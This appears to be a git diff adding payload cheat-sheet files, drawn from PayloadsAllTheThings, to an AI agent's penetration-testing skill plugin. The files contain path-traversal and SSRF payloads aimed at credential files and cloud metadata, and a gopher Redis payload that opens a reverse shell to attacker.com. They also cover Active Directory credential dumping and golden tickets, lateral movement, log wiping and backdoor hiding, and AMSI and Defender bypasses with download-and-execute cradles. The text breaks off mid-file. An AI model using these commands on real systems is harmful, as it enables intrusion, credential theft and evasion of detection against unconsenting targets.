projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/path-traversal/path-traversal-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/path-traversal/path-traversal-quickstart.md diff --git a/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/basic.md new file mode 100644 index 0000000..482748e --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/basic.md @@ -0,0 +1,90 @@ +--- +source: PayloadsAllTheThings +patt-path: Directory Traversal/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Directory%20Traversal/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Path Traversal — Basic Payloads + +## Basic Sequences + +``` +../ +..\ +..\/ +../../../etc/passwd +..\..\..\windows\win.ini +``` + +## Absolute Path + +``` +/etc/passwd +/etc/shadow +C:\Windows\win.ini +C:\Windows\System32\drivers\etc\hosts +``` + +## Null Byte Injection (PHP < 5.3.4) + +``` +../../../etc/passwd%00 +../../../etc/passwd%00.jpg +../../../etc/passwd\x00 +/.%00./.%00./etc/passwd +``` + +## Linux Sensitive Targets + +``` +/etc/passwd +/etc/shadow +/etc/hosts +/etc/hostname +/etc/issue +/etc/crontab +/root/.ssh/id_rsa +/root/.ssh/authorized_keys +/home/user/.bash_history +/proc/self/environ +/proc/self/cmdline +/proc/version +/var/log/apache2/access.log +/var/log/apache2/error.log +/var/log/auth.log +``` + +## Windows Sensitive Targets + +``` +C:\Windows\win.ini +C:\Windows\System32\drivers\etc\hosts +C:\Windows\System32\config\SAM +C:\Windows\repair\SAM +C:\Users\Administrator\Desktop\secret.txt +C:\inetpub\wwwroot\web.config +C:\xampp\apache\conf\httpd.conf +``` + +## Depth Variants + +``` +../../etc/passwd +../../../etc/passwd +../../../../etc/passwd +../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../../../etc/passwd +``` + +## With Extension Appended (bypass) + +``` +../../../etc/passwd%00.jpg # null byte +../../../etc/passwd/. # trailing slash-dot +../../../etc/passwd # no extension needed if input parsed +``` + +*Full list: patt-fetcher agent → "Directory Traversal"* diff --git a/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/bypass.md new file mode 100644 index 0000000..c592741 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/path-traversal/payloads/bypass.md @@ -0,0 +1,91 @@ +--- +source: PayloadsAllTheThings +patt-path: Directory Traversal/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Directory%20Traversal/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# Path Traversal — Bypass Payloads + +## URL Encoding + +``` +%2e%2e%2f # ../ +%2e%2e/ # .../ +..%2f # ../ +%2e%2e%5c # ..\ +..%5c # ..\ +%2e%2e%2f%2e%2e%2fetc%2fpasswd +``` + +## Double URL Encoding + +``` +%252e%252e%252f # ../ +%252e%252e%255c # ..\ +%252e%252e/ # .../ +..%255c..%255c # ..\..\ Windows +%25%32%65%25%32%65%25%32%66 # ../ +``` + +## Unicode / Overlong UTF-8 + +``` +%c0%ae%c0%ae/ # ../ (overlong) +%c0%ae%c0%ae%c0%af # ../ +%u002e%u002e%u2215 # ../ +%u002e%u002e/ +..%u2215 # ../ with fullwidth slash +..%c0%af # ../ overlong +``` + +## Duplicate Sequences (strip once bypass) + +``` +....// # becomes ../ after strip +....\/ # becomes ..\ after strip +..././ # becomes ../ +.../.../ # deep nesting +..;/ # reverse proxy bypass +``` + +## Mangled Path + +``` +..././ +...\.\ +..\../ +..%00/ +``` + +## Windows UNC Path + +``` +\\localhost\c$\windows\win.ini +\\127.0.0.1\c$\windows\win.ini +\\.\c:\windows\win.ini +``` + +## Path Normalization Bypass + +``` +/var/www/../../etc/passwd +/./../../etc/passwd +``` + +## ASP.NET Cookieless + +``` +/(S(X))/ +/(S(X))/admin/(S(X))/main.aspx +``` + +## Wrapper Combinations + +``` +php://filter/read=convert.base64-encode/resource=../../../etc/passwd +expect://id +``` + +*Full list: patt-fetcher agent → "Directory Traversal"* diff --git a/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/basic.md b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/basic.md new file mode 100644 index 0000000..4fd4d04 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/basic.md @@ -0,0 +1,76 @@ +--- +source: PayloadsAllTheThings +patt-path: Server Side Request Forgery/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SSRF — Basic Payloads + +## Localhost Variants + +``` +http://localhost/ +http://localhost:80/ +http://127.0.0.1/ +http://127.0.0.1:22 +http://127.0.0.1:3306 +http://0.0.0.0/ +http://0.0.0.0:8080/ +http://[::1]/ +http://[::]:80/ +``` + +## Cloud Metadata — AWS + +``` +http://169.254.169.254/latest/meta-data/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ +http://169.254.169.254/latest/meta-data/hostname +http://169.254.169.254/latest/user-data/ +http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME +``` + +**IMDSv2 (token-based):** +```bash +# Step 1 - get token: +curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" +# Step 2 - use token: +curl -H "X-aws-ec2-metadata-token: TOKEN" http://169.254.169.254/latest/meta-data/ +``` + +## Cloud Metadata — Azure + +``` +http://169.254.169.254/metadata/instance?api-version=2021-02-01 +http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/ +``` +Header required: `Metadata: true` + +## Cloud Metadata — GCP + +``` +http://metadata.google.internal/computeMetadata/v1/ +http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +http://metadata.google.internal/computeMetadata/v1/project/project-id +``` +Header required: `Metadata-Flavor: Google` + +## Internal Port Scanning + +``` +http://127.0.0.1:22 # SSH +http://127.0.0.1:25 # SMTP +http://127.0.0.1:80 # HTTP +http://127.0.0.1:443 # HTTPS +http://127.0.0.1:3306 # MySQL +http://127.0.0.1:5432 # PostgreSQL +http://127.0.0.1:6379 # Redis +http://127.0.0.1:8080 # Alt HTTP +http://127.0.0.1:8443 # Alt HTTPS +http://127.0.0.1:9200 # Elasticsearch +http://127.0.0.1:27017 # MongoDB +``` + +*Full list: patt-fetcher agent → "Server Side Request Forgery"* diff --git a/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/bypass.md b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/bypass.md new file mode 100644 index 0000000..98c2ccf --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/payloads/bypass.md @@ -0,0 +1,92 @@ +--- +source: PayloadsAllTheThings +patt-path: Server Side Request Forgery/README.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/README.md +last-curated: 2026-03-13 +priority: critical +--- + +# SSRF — Bypass Payloads + +## IP Encoding — Decimal + +``` +http://2130706433/ # 127.0.0.1 +http://2130706433:80/ # 127.0.0.1:80 +http://2852039166/ # 169.254.169.254 +``` + +## IP Encoding — Hexadecimal + +``` +http://0x7f000001/ # 127.0.0.1 +http://0x7f000001:80/ +http://0xa9fea9fe/ # 169.254.169.254 +``` + +## IP Encoding — Octal + +``` +http://0177.0.0.1/ # 127.0.0.1 +http://0177.0000.0000.0001/ +``` + +## IPv6 + +``` +http://[::1]/ +http://[::]:80/ +http://[::ffff:127.0.0.1]/ +http://[0:0:0:0:0:ffff:127.0.0.1]/ +http://[::ffff:7f00:1]/ # 127.0.0.1 hex +``` + +## Domain Redirect Bypass + +``` +http://localtest.me # resolves to 127.0.0.1 +http://127.0.0.1.nip.io +http://127.0.0.1.xip.io +http://customer.app.127.0.0.1.nip.io +``` + +## URL Confusion + +``` +http://attacker.com@127.0.0.1/ +http://127.0.0.1#attacker.com +http://127.0.0.1/\@attacker.com +``` + +## Protocol Schemes + +``` +file:///etc/passwd +dict://127.0.0.1:6379/ +gopher://127.0.0.1:6379/_COMMAND +gopher://127.0.0.1:25/_MAIL FROM:attacker@example.com +sftp://attacker.com:22/ +tftp://attacker.com:69/ +``` + +## Gopher — Redis Attack + +``` +gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a +``` + +## URL Shortener / Open Redirect Chain + +``` +http://target.com/redirect?url=http://127.0.0.1/admin +http://short.url/xxxxx → redirects to http://169.254.169.254/ +``` + +## Double URL Encoding + +``` +http://127.0.0.1%2F@attacker.com +%68%74%74%70%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31 +``` + +*Full list: patt-fetcher agent → "Server Side Request Forgery"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-cheat-sheet.md b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-cheat-sheet.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-cheat-sheet.md rename to plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-cheat-sheet.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-portswigger-labs-complete.md b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-portswigger-labs-complete.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-portswigger-labs-complete.md rename to plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-portswigger-labs-complete.md diff --git a/projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-quickstart.md b/plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-quickstart.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/server-side/ssrf/ssrf-quickstart.md rename to plugins/pentest/skills/pentest/attacks/server-side/ssrf/ssrf-quickstart.md diff --git a/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/attacks.md b/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/attacks.md new file mode 100644 index 0000000..f116c3b --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/attacks.md @@ -0,0 +1,93 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Active Directory Attack.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md +last-curated: 2026-03-13 +priority: critical +--- + +# Active Directory — Attack Payloads + +## Kerberoasting + +```bash +# Enumerate SPNs and request TGS tickets +python3 GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request +python3 GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt + +# With NTLM hash +python3 GetUserSPNs.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP -request + +# Crack offline +hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt +``` + +## AS-REP Roasting + +```bash +# Find accounts with pre-auth disabled +python3 GetNPUsers.py DOMAIN/ -dc-ip DC_IP -usersfile users.txt -no-pass -format hashcat +python3 GetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request -format hashcat + +# Crack offline +hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt +john asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt +``` + +## Pass-the-Hash (PTH) + +```bash +# wmiexec.py +python3 wmiexec.py DOMAIN/Administrator@TARGET -hashes :NTLM_HASH +python3 wmiexec.py DOMAIN/user@TARGET -hashes LM_HASH:NT_HASH "whoami" + +# psexec.py +python3 psexec.py DOMAIN/Administrator@TARGET -hashes :NTLM_HASH + +# crackmapexec +crackmapexec smb TARGET -u Administrator -H NTLM_HASH --exec-method wmiexec +crackmapexec smb SUBNET/24 -u Administrator -H NTLM_HASH +``` + +## DCSync + +```bash +# Dump all hashes from DC +python3 secretsdump.py DOMAIN/Administrator@DC_IP -just-dc +python3 secretsdump.py DOMAIN/Administrator:password@DC_IP -just-dc-ntlm +python3 secretsdump.py -hashes :NTLM_HASH DOMAIN/Administrator@DC_IP + +# Dump specific user +python3 secretsdump.py DOMAIN/user:pass@DC_IP -just-dc-user krbtgt +``` + +## Golden Ticket + +```bash +# 1. Get krbtgt hash via DCSync +python3 secretsdump.py DOMAIN/Administrator@DC_IP -just-dc-user krbtgt + +# 2. Get domain SID +python3 getPac.py DOMAIN/user:password -targetUser Administrator + +# 3. Forge golden ticket +python3 ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXXX -domain DOMAIN Administrator +python3 ticketer.py -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain DOMAIN -groups 512 fake_admin + +# 4. Use ticket +export KRB5CCNAME=Administrator.ccache +python3 wmiexec.py -k -no-pass DOMAIN/Administrator@DC_IP +``` + +## BloodHound Enumeration + +```bash +# Collect AD data +python3 bloodhound-python -u user -p password -d DOMAIN -dc DC_IP -c All +bloodhound-python -u user -p password -d DOMAIN -ns DC_IP --zip + +# SharpHound (Windows) +.\SharpHound.exe -c All --zipfilename bloodhound.zip +``` + +*Full list: patt-fetcher agent → "Active Directory"* diff --git a/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/lateral.md b/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/lateral.md new file mode 100644 index 0000000..f8a3ac6 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/active-directory/payloads/lateral.md @@ -0,0 +1,94 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Active Directory Attack.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md +last-curated: 2026-03-13 +priority: critical +--- + +# Active Directory — Lateral Movement Payloads + +## WMI Execution + +```bash +# Impacket wmiexec +python3 wmiexec.py DOMAIN/user:password@TARGET +python3 wmiexec.py DOMAIN/user:password@TARGET "whoami" +python3 wmiexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET + +# Windows native +wmic /node:TARGET /user:DOMAIN\user /password:password process call create "cmd.exe /c whoami > C:\out.txt" +``` + +## SMBExec + +```bash +python3 smbexec.py DOMAIN/user:password@TARGET +python3 smbexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET +``` + +## Evil-WinRM + +```bash +# Password auth +evil-winrm -i TARGET -u user -p password + +# Hash auth (PTH) +evil-winrm -i TARGET -u user -H NTLM_HASH + +# With SSL +evil-winrm -i TARGET -u user -p password -S + +# Upload/Download +evil-winrm> upload /local/file C:\remote\path +evil-winrm> download C:\remote\file /local/path +``` + +## PsExec + +```bash +# Impacket psexec +python3 psexec.py DOMAIN/user:password@TARGET +python3 psexec.py -hashes :NTLM_HASH DOMAIN/Administrator@TARGET + +# Sysinternals PsExec +PsExec.exe \\TARGET -u DOMAIN\user -p password cmd.exe +PsExec.exe \\TARGET -u DOMAIN\user -p password -s cmd.exe # SYSTEM + +# CrackMapExec +crackmapexec smb TARGET -u user -p password -x "whoami" +crackmapexec smb TARGET -u user -p password --exec-method smbexec -x "whoami" +``` + +## RDP Enable (via registry) + +```bash +# Enable RDP remotely via reg +python3 reg.py DOMAIN/user:password@TARGET add "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + +# Enable via WMI +wmic /node:TARGET /user:user /password:pass path win32_terminalservicesetting WHERE (__CLASS != "") CALL SetAllowTSConnections 1 + +# Firewall rule add +netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow +``` + +## Pass-the-Ticket (PTT) + +```bash +# Import ticket (Windows) +Rubeus.exe ptt /ticket:ticket.kirbi + +# Import ticket (Linux) +export KRB5CCNAME=/path/to/ticket.ccache +python3 wmiexec.py -k -no-pass DOMAIN/user@TARGET +``` + +## DCOM Lateral Movement + +```bash +python3 dcomexec.py DOMAIN/user:password@TARGET "whoami" +python3 dcomexec.py -hashes :NTLM_HASH DOMAIN/user@TARGET "cmd /c whoami" +``` + +*Full list: patt-fetcher agent → "Active Directory"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/system/active-directory/system-exploitation.md b/plugins/pentest/skills/pentest/attacks/system/active-directory/system-exploitation.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/system/active-directory/system-exploitation.md rename to plugins/pentest/skills/pentest/attacks/system/active-directory/system-exploitation.md diff --git a/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/linux.md b/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/linux.md new file mode 100644 index 0000000..705e020 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/linux.md @@ -0,0 +1,119 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Linux - Evasion.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Linux%20-%20Evasion.md +last-curated: 2026-03-13 +priority: critical +--- + +# Linux Evasion Payloads + +## Bash History Disable + +```bash +# Disable for current session +unset HISTFILE +export HISTFILE=/dev/null +export HISTSIZE=0 +export HISTFILESIZE=0 + +# Prevent history write on exit +set +o history + +# Clear existing history +history -c +history -w +cat /dev/null > ~/.bash_history + +# One-liner on spawn +export HISTFILE=/dev/null HISTSIZE=0; unset HISTFILE +``` + +## Log Clearing + +```bash +# System logs +cat /dev/null > /var/log/auth.log +cat /dev/null > /var/log/syslog +cat /dev/null > /var/log/messages +cat /dev/null > /var/log/secure + +# Apache logs +cat /dev/null > /var/log/apache2/access.log +cat /dev/null > /var/log/apache2/error.log + +# Last/who logs +cat /dev/null > /var/log/wtmp +cat /dev/null > /var/log/btmp +cat /dev/null > /var/log/lastlog + +# utmp (active sessions) +echo "" > /var/run/utmp + +# Selective log entry removal +sed -i '/ATTACKER_IP/d' /var/log/auth.log +grep -v "ATTACKER_IP" /var/log/auth.log > /tmp/auth.log && mv /tmp/auth.log /var/log/auth.log +``` + +## Timestomping + +```bash +# Match timestamps of another file +touch -r /bin/ls /tmp/backdoor +touch -r /etc/passwd /tmp/backdoor.sh + +# Set specific timestamp +touch -t 202001010000 /tmp/backdoor +touch -d "2020-01-01 00:00:00" /tmp/backdoor + +# Modify access/modify/change times +touch -a -t 202001010000 /tmp/file # access time +touch -m -t 202001010000 /tmp/file # modify time +``` + +## Process Name Masking + +```bash +# Rename process via argv[0] +exec -a "[kworker/0:1]" /tmp/backdoor + +# Using perl +perl -e 'use POSIX; $0 = "[kworker/u:1]"; sleep(9999999);' & + +# Python +python3 -c " +import sys +import ctypes +libc = ctypes.CDLL(None) +argv = ctypes.pointer(ctypes.c_char_p(b'[kworker/0:1]')) +sys.argv[0] = '[kworker/0:1]' +" & +``` + +## File Hiding + +```bash +# Prepend dot to hide in ls (without -a) +cp backdoor .backdoor +mv backdoor .$(date +%s) + +# Hide in /dev or /proc (unusual dirs) +cp backdoor /dev/shm/.hidden +cp backdoor /tmp/.tmp_hidden + +# Create hidden directory +mkdir .hidden_dir +``` + +## Anti-Forensics + +```bash +# Secure delete +shred -u -n 3 /tmp/sensitive_file +wipe /tmp/sensitive_file + +# Remove command from history immediately +kill -9 $$ # kill shell without writing history +``` + +*Full list: patt-fetcher agent → "Linux Evasion"* diff --git a/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/windows.md b/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/windows.md new file mode 100644 index 0000000..8a3c4cc --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/evasion/payloads/windows.md @@ -0,0 +1,91 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Windows - AMSI Bypass.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md +last-curated: 2026-03-13 +priority: critical +--- + +# Windows Evasion — AMSI Bypass & Obfuscation + +## AMSI Bypass — amsiInitFailed (PowerShell) + +```powershell +# Force AMSI init failure +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) + +# Obfuscated variant +[Ref].Assembly.GetType('System.Management.Automation.'+[char]65+'msiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +``` + +## AMSI Bypass — Memory Patching + +```powershell +# Patch AmsiScanBuffer to return AMSI_RESULT_CLEAN +$a=[Ref].Assembly.GetTypes();foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1) + +# Via Add-Type +Add-Type -TypeDefinition @" +using System; +using System.Runtime.InteropServices; +public class AMSI { + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ +``` + +## AMSI Bypass — AMSI.fail snippets + +```powershell +# Downgrade PowerShell version (AMSI not present in v2) +powershell -version 2 -command "IEX (New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')" + +# Null the context +$v=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');$f=$v.GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static');$f.SetValue($null,[IntPtr]0) +``` + +## PowerShell Obfuscation + +```powershell +# Invoke-Expression aliases +IEX +Invoke-Expression +&([scriptblock]::Create(...)) +.([scriptblock]::Create(...)) + +# String concatenation +$cmd = "Invoke" + "-Expression" +& $cmd "whoami" + +# Base64 encode/decode +$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("whoami")) +powershell -enc $b64 + +# Tick escapes +I`E`X (New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1') + +# Concatenation +(New-Object Net.WebClient).DownloadString('ht'+'tp://attacker/shell.ps1') | IEX +``` + +## PowerShell Execution Policy Bypass + +```powershell +powershell -ExecutionPolicy Bypass -File shell.ps1 +powershell -ep bypass -c "IEX(...)" +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Defender Exclusion (if admin) + +```powershell +Add-MpPreference -ExclusionPath "C:\Temp" +Set-MpPreference -DisableRealtimeMonitoring $true +``` + +*Full list: patt-fetcher agent → "Windows AMSI Bypass"* diff --git a/projects/pentest/.claude/skills/pentest/attacks/system/exploit-development/system-exploitation.md b/plugins/pentest/skills/pentest/attacks/system/exploit-development/system-exploitation.md similarity index 100% rename from projects/pentest/.claude/skills/pentest/attacks/system/exploit-development/system-exploitation.md rename to plugins/pentest/skills/pentest/attacks/system/exploit-development/system-exploitation.md diff --git a/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/hashcat-modes.md b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/hashcat-modes.md new file mode 100644 index 0000000..98d0cee --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/hashcat-modes.md @@ -0,0 +1,74 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Hash Cracking.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Hash%20Cracking.md +last-curated: 2026-03-13 +priority: critical +--- + +# Hashcat Mode (-m) Reference Table + +| Mode | Hash Type | Example Hash | +|------|-----------|--------------| +| 0 | MD5 | `5d41402abc4b2a76b9719d911017c592` | +| 10 | md5($pass.$salt) | | +| 20 | md5($salt.$pass) | | +| 100 | SHA1 | `aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d` | +| 400 | phpass (WordPress/Joomla) | `$P$B...` | +| 500 | md5crypt ($1$) | `$1$salt$hash` | +| 900 | MD4 | | +| 1000 | NTLM | `b4b9b02e6f09a9bd760f388b67351e2b` | +| 1400 | SHA256 | | +| 1700 | SHA512 | | +| 1800 | sha512crypt ($6$) | `$6$salt$hash` | +| 2100 | Domain Cached Credentials (DCC2) | | +| 3000 | LM | | +| 3200 | bcrypt ($2*$) | `$2a$05$...` | +| 5500 | NetNTLMv1 | | +| 5600 | NetNTLMv2 | `user::domain:challenge:hash` | +| 7300 | IPMI2 RAKP HMAC-SHA1 | | +| 11300 | Bitcoin Wallet | | +| 13100 | Kerberos TGS-REP (Kerberoast) | `$krb5tgs$23$*...` | +| 16500 | JWT (HS256) | | +| 18200 | Kerberos AS-REP (AS-REP Roast) | `$krb5asrep$23$...` | +| 22000 | WPA-PBKDF2-PMKID+EAPOL | | +| 22001 | WPA-PMK (PMKID) | | + +## Quick Reference by Scenario + +```bash +# Got NTLM from secretsdump +hashcat -m 1000 hashes.txt rockyou.txt + +# Got NetNTLMv2 from Responder +hashcat -m 5600 responder.txt rockyou.txt + +# Got Kerberoast ticket +hashcat -m 13100 tgs.txt rockyou.txt + +# Got AS-REP from GetNPUsers +hashcat -m 18200 asrep.txt rockyou.txt + +# Got bcrypt from web app DB +hashcat -m 3200 bcrypt.txt rockyou.txt --force + +# Got WPA2 handshake +hashcat -m 22000 capture.hc22000 rockyou.txt + +# Got JWT +hashcat -m 16500 jwt.txt rockyou.txt +``` + +## Mask Attack Examples + +```bash +# 8-char alphanumeric +hashcat -m 1000 hash.txt -a 3 ?a?a?a?a?a?a?a?a + +# Known pattern: Pass + 4 digits +hashcat -m 1000 hash.txt -a 6 rockyou.txt ?d?d?d?d + +# Charset: ?l=lower ?u=upper ?d=digit ?s=special ?a=all +``` + +*Full list: patt-fetcher agent → "Hash Cracking"* diff --git a/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/rules.md b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/rules.md new file mode 100644 index 0000000..14a8ad2 --- /dev/null +++ b/plugins/pentest/skills/pentest/attacks/system/hash-cracking/payloads/rules.md @@ -0,0 +1,138 @@ +--- +source: PayloadsAllTheThings +patt-path: Methodology and Resources/Hash Cracking.md +patt-url: https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Methodology%20and%20Resources/Hash%20Cracking.md +last-curated: 2026-03-14 +priority: medium +--- + +# Hash Cracking — Rules & Wordlists + +## Quick Hits + +### Top Rule Files (Hashcat) +```bash +# Built-in rules (Kali: /usr/share/hashcat/rules/) +best64.rule # best 64 mutations — fast, high coverage +d3ad0ne.rule # 34k rules — aggressive +dive.rule # 99k rules — very aggressive, slow +rockyou-30000.rule # 30k rules derived from RockYou analysis +OneRuleToRuleThemAll.rule # community favourite — high hit rate + +# Example usage +hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule +hashcat -m 1000 hashes.txt rockyou.txt -r OneRuleToRuleThemAll.rule +hashcat -m 1000 hashes.txt rockyou.txt -r d3ad0ne.rule -r best64.rule # stack rules +``` + +### Top Wordlists +```bash +# RockYou (14M passwords — default starting point) +/usr/share/wordlists/rockyou.txt + +# SecLists (comprehensive) +/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt +/usr/share/seclists/Passwords/darkweb2017-top10000.txt +/usr/share/seclists/Passwords/Leaked-Databases/ + +# CrackStation (1.5B words) +https://crackstation.net/files/crackstation-human-only.txt.gz # 63M human passwords +https://crackstation.net/files/crackstation.txt.gz # 1.5B total + +# Probable wordlists (curated frequency-ordered) +https://github.com/berzerk0/Probable-Wordlists +``` + +## Extended List + +### Mask Attack (Brute Force Patterns) +```bash +# Hashcat masks: ?l=lower ?u=upper ?d=digit ?s=special ?a=all +hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d # e.g. Password12 +hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?d?d?d?d # e.g. Pass1234 +hashcat -m 1000 hashes.txt -a 3 ?l?l?l?l?l?l?l?l # 8 lowercase + +# Company password pattern (very common in corp environments) +hashcat -m 1000 hashes.txt -a 3 Company?d?d?d?d! # Company2024! + +# 8-char mixed (common policy) +hashcat -m 1000 hashes.txt -a 3 --increment --increment-min 8 ?a?a?a?a?a?a?a?a +``` + +### Hybrid Attack (Wordlist + Mask) +```bash +# Wordlist + append digits (password → password123) +hashcat -m 1000 hashes.txt -a 6 rockyou.txt ?d?d?d + +# Wordlist + prepend special + year (password → @password2023) +hashcat -m 1000 hashes.txt -a 7 ?s rockyou.txt +hashcat -m 1000 hashes.txt -a 6 rockyou.txt ?d?d?d?d + +# Combinator attack (word1 + word2) +hashcat -m 1000 hashes.txt -a 1 wordlist1.txt wordlist2.txt +``` + +### Custom Wordlist Generation (CUPP / CeWL) +```bash 